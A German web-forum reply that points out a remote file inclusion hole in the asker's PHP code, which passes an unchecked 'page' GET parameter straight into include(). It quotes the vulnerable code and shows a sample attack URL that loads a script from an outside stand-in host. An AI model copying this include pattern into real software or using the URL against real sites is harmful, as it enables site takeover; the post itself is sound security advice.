title image


Smiley Re: Website mit angreifbarem Script --- Wer kann mir helfen?
Moin,



ich sehe ztwar kein Uploadform, aber Du hast eine schwerwiegende Sicherheitslücke in dem Teil hier:



$page = $HTTP_GET_VARS["page"];

if($page=="")

{

$page1 = "start.php";

}

else

{

$page1 = "$page.php";

}

include("$page1"); ?>



Du includest ungeprüfte Variablen als Seiteninhalte. In Deinem Fall braucht mann nur Deine Seite so aufzurufen: http://example.org/script.php?page=http://example.net/boesesscript und schon hast Du diesen Inhalt bei Dir auf der Seite.



Verwende ___niemals___ ungeprüfte Parameter in Deinen Scripten.



Schau mal ein paar Zeilen weiter unten, da steht irgendwo was von "virtuellem Selbstmord", da wurde dieses Thema schonmal behandelt.



Gruß Uwe


Glaskugel

Es ist ein Drama: Die Glaskugeln der potenziellen Helfer sind immer, wenn sie gebraucht werden, entweder verschmutzt oder gerade zur Reparatur unterwegs. ;-)


 


geschrieben von

Login

E-Mail:
  

Passwort:
  

Beitrag anfügen

Symbol:
 
 
 
 
 
 
 
 
 
 
 
 
 

Überschrift: